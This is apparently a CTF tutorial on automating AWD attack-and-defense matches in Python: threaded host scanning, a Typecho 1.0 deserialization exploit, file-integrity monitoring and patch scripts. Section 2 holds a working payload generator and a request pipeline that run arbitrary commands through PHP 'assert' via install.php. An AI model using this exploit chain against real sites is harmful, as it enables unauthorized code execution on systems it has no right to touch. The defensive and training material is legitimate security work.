# Goodbye "script kiddie": using Python multithreading in BugKu AWD to quickly locate live targets and automate attacks
In the AWD (Attack With Defense) mode of cyber-security competitions, time is score. When traditional manual operation meets the second-by-second pace of a match, automated tooling becomes the key to winning. This article starts from basic Python scripts and builds up a complete automated attack-and-defense toolkit, covering the full flow of target discovery, vulnerability exploitation, and automated flag submission.

## 1. Host discovery: from single-threaded to industrial-grade scanning

### 1.1 Bottlenecks of the basic discovery script

Beginners usually start with a simple loop over the `ping` command:

```python
import os

for i in range(1, 255):
    ip = f"192.168.1.{i}"
    # os.system returns the exit status; ping exits 0 when the host replied
    response = os.system(f"ping -c 1 {ip}")
    if response == 0:
        print(f"[+] {ip} is alive")
```

This linear scan has three fatal defects:

- Slow: at roughly 1 second per ping, a full scan takes more than 4 minutes.
- No exception handling: network jitter leads to misjudged hosts.
- Poor readability: the output has no structure.

### 1.2 Multithreading options compared

| Approach | Pros | Cons | Best for |
|---|---|---|---|
| `threading` | Built-in, nothing to install | Thread pool must be managed by hand | Simple concurrent tasks |
| `multiprocessing` | Avoids the GIL | High per-process overhead | CPU-bound tasks |
| `concurrent.futures` | Unified, easy-to-use interface | Requires Python 3.2+ | I/O-bound tasks (recommended) |

Recommended implementation using a `ThreadPoolExecutor` thread pool:

```python
from concurrent.futures import ThreadPoolExecutor
import pythonping  # uses raw ICMP sockets, so it normally needs root/administrator rights

def check_host(ip):
    try:
        # One probe with a 1-second timeout so a silent host cannot hang the thread
        response = pythonping.ping(ip, count=1, timeout=1)
        if response.success():
            return ip
    except Exception:
        pass
    return None

def scan_network(base_ip="192.168.1", workers=100):
    ips = [f"{base_ip}.{i}" for i in range(1, 255)]
    alive_ips = []
    with ThreadPoolExecutor(max_workers=workers) as executor:
        results = executor.map(check_host, ips)
        # filter(None, ...) drops the None results of unreachable hosts
        for ip in filter(None, results):
            alive_ips.append(ip)
            print(f"[+] Active host: {ip}")
    return alive_ips
```

Key optimizations:

- Timeout control: a 1-second timeout prevents hung threads.
- Exception capture: exceptions caused by network jitter are handled.
- Result filtering: `filter` drops the `None` results automatically.

## 2. Automated exploitation: Typecho 1.0 deserialization as the example

### 2.1 The vulnerability in brief

The core of the Typecho 1.0 deserialization vulnerability:

- User-supplied serialized data is not filtered.
- The `__wakeup` or `__destruct` magic methods trigger dangerous operations.
- PHP's `assert` function is used to execute arbitrary code.

### 2.2 Building the payload generator

Convert the PHP payload from the original write-up into a Python generator:

```python
import base64
import subprocess

def generate_payload(command):
    # PHP source of the gadget chain; braces are doubled because this is an f-string.
    # php -r takes code without <?php ... ?> tags, so none are included here.
    php_code = f"""
class Typecho_Feed {{
    const RSS2 = 'RSS 2.0';
    private $_type;
    private $_items;
    public function __construct() {{
        $this->_type = self::RSS2;
        $this->_items[0] = [
            'category' => [new Typecho_Request()],
            'author' => new Typecho_Request()
        ];
    }}
}}
class Typecho_Request {{
    private $_params = ['screenName' => '{command}'];
    private $_filter = ['assert'];
}}
$exp = [
    'adapter' => new Typecho_Feed(),
    'prefix' => 'typecho_'
];
echo base64_encode(serialize($exp));
"""
    # Run the code with the PHP CLI (php must be on PATH) and return the base64 payload
    process = subprocess.run(
        ["php", "-r", php_code],
        capture_output=True,
        text=True
    )
    return process.stdout.strip()
```

### 2.3 Automated attack pipeline

```python
import requests

def exploit_target(url, payload):
    headers = {
        "User-Agent": "Mozilla/5.0",
        "Content-Type": "application/x-www-form-urlencoded"
    }
    try:
        # Check whether install.php exists
        check = requests.get(f"{url}/install.php", headers=headers, timeout=3)
        if check.status_code != 200:
            return False
        # Send the attack request
        data = {"__typecho_config": payload}
        response = requests.post(
            f"{url}/install.php",
            data=data,
            headers=headers,
            timeout=5
        )
        # Verify the result
        return "File not found" not in response.text
    except Exception:
        return False
```

## 3. Automating the defensive side

### 3.1 Monitoring key files

```python
import hashlib
from pathlib import Path

class FileMonitor:
    def __init__(self, web_root):
        self.web_root = Path(web_root)
        self.baseline = {}

    def create_baseline(self):
        # Record size, mtime and content hash of every file under the web root
        for file in self.web_root.rglob("*"):
            if file.is_file():
                self.baseline[str(file)] = {
                    "size": file.stat().st_size,
                    "mtime": file.stat().st_mtime,
                    "hash": hashlib.md5(file.read_bytes()).hexdigest()
                }

    def check_integrity(self):
        alerts = []
        for filepath, original in self.baseline.items():
            current = Path(filepath)
            if not current.exists():
                alerts.append(f"[!] File deleted: {filepath}")
                continue
            current_stat = {
                "size": current.stat().st_size,
                "mtime": current.stat().st_mtime,
                "hash": hashlib.md5(current.read_bytes()).hexdigest()
            }
            if current_stat != original:
                alerts.append(f"[!] File modified: {filepath}")
        return alerts
```

### 3.2 Automated patch deployment

```python
from pathlib import Path

def apply_patch(web_root):
    install_php = Path(web_root) / "install.php"
    if install_php.exists():
        # Back up the original file
        install_php.rename(install_php.with_suffix(".php.bak"))
        # Create a harmless replacement file
        with open(install_php, "w") as f:
            f.write("<?php header('HTTP/1.1 403 Forbidden'); die(); ?>")
```
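Worked example, added here and not code from the original article: it extends the file-monitoring idea of 3.1 with SHA-256 hashing, detection of newly added files (a dropped webshell is a new file, which a loop over the baseline never visits), and rollback from a backup copy of the web root, the usual companion to the patch step in 3.2. The directory layout, file contents and backup location are constructed for the demo.

```python
import hashlib
import shutil
import tempfile
from pathlib import Path

def file_hash(path: Path) -> str:
    # SHA-256 rather than MD5: MD5 collisions are practical, so a colliding
    # replacement file could pass a monitor that compares only MD5.
    return hashlib.sha256(path.read_bytes()).hexdigest()

def snapshot(root: Path) -> dict:
    # Relative path -> content hash for every regular file under root.
    return {str(p.relative_to(root)): file_hash(p) for p in root.rglob("*") if p.is_file()}

def diff_snapshot(baseline: dict, current: dict) -> dict:
    # Added files are reported too: a dropped webshell is a new file, which a
    # loop over the baseline alone never visits.
    return {
        "added": sorted(set(current) - set(baseline)),
        "deleted": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
    }

def restore(root: Path, backup: Path, report: dict) -> list:
    # Roll the web root back to the backup copy (remove added, re-copy modified/deleted).
    actions = []
    for rel in report["added"]:
        (root / rel).unlink()
        actions.append(f"removed {rel}")
    for rel in report["modified"] + report["deleted"]:
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        shutil.copy2(backup / rel, root / rel)
        actions.append(f"restored {rel}")
    return actions

def demo() -> dict:
    # Constructed scenario: a two-file web root, its backup copy, then three kinds of tampering.
    with tempfile.TemporaryDirectory() as tmp:
        root, backup = Path(tmp) / "www", Path(tmp) / "backup"
        root.mkdir()
        (root / "index.php").write_text("<?php echo 'hello'; ?>")
        (root / "install.php").write_text("<?php header('HTTP/1.1 403 Forbidden'); die(); ?>")
        shutil.copytree(root, backup)
        baseline = snapshot(root)
        (root / "index.php").write_text("<?php echo 'tampered'; ?>")  # modified
        (root / "install.php").unlink()                                # deleted
        (root / "shell.php").write_text("<?php /* unexpected */ ?>")   # added
        report = diff_snapshot(baseline, snapshot(root))
        actions = restore(root, backup, report)
        return {"report": report, "actions": actions, "clean": snapshot(root) == baseline}
```

In a match this runs on a timer against the real web root and a backup taken before the first round; the report doubles as the alert log.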
## 4. Practical competition tips and exception handling

### 4.1 Coping with network jitter

In an AWD environment an unstable network is the norm. Add a retry mechanism to the key functions:

```python
import requests
from tenacity import retry, stop_after_attempt, wait_exponential

@retry(
    stop=stop_after_attempt(3),
    wait=wait_exponential(multiplier=1, min=1, max=10)
)
def robust_request(url, timeout=3):
    try:
        response = requests.get(url, timeout=timeout)
        response.raise_for_status()
        return response
    except requests.exceptions.RequestException as e:
        print(f"Request failed: {str(e)}")
        # Re-raise so tenacity can retry with exponential backoff
        raise
```

### 4.2 Performance tuning

Adjust the thread-pool parameters to the network environment:

| Network condition | Recommended workers | Timeout | Retries |
|---|---|---|---|
| LAN (low latency) | 200-300 | 0.5s | 1 |
| Cross-datacenter (medium latency) | 100-150 | 1s | 2 |
| High latency / unstable | 50-80 | 2s | 3 |

### 4.3 Logging and analysis

```python
import logging
from logging.handlers import RotatingFileHandler

def setup_logging():
    logger = logging.getLogger("awd_tool")
    logger.setLevel(logging.DEBUG)
    # Rotate at 5 MB and keep 3 old files so a long match cannot fill the disk
    handler = RotatingFileHandler(
        "awd.log", maxBytes=5*1024*1024, backupCount=3
    )
    formatter = logging.Formatter(
        "%(asctime)s - %(levelname)s - %(message)s"
    )
    handler.setFormatter(formatter)
    logger.addHandler(handler)
    return logger
```

In real matches, a sensibly sized thread pool is usually more effective than simply adding more threads. When network latency is high, an oversized pool actually degrades overall performance.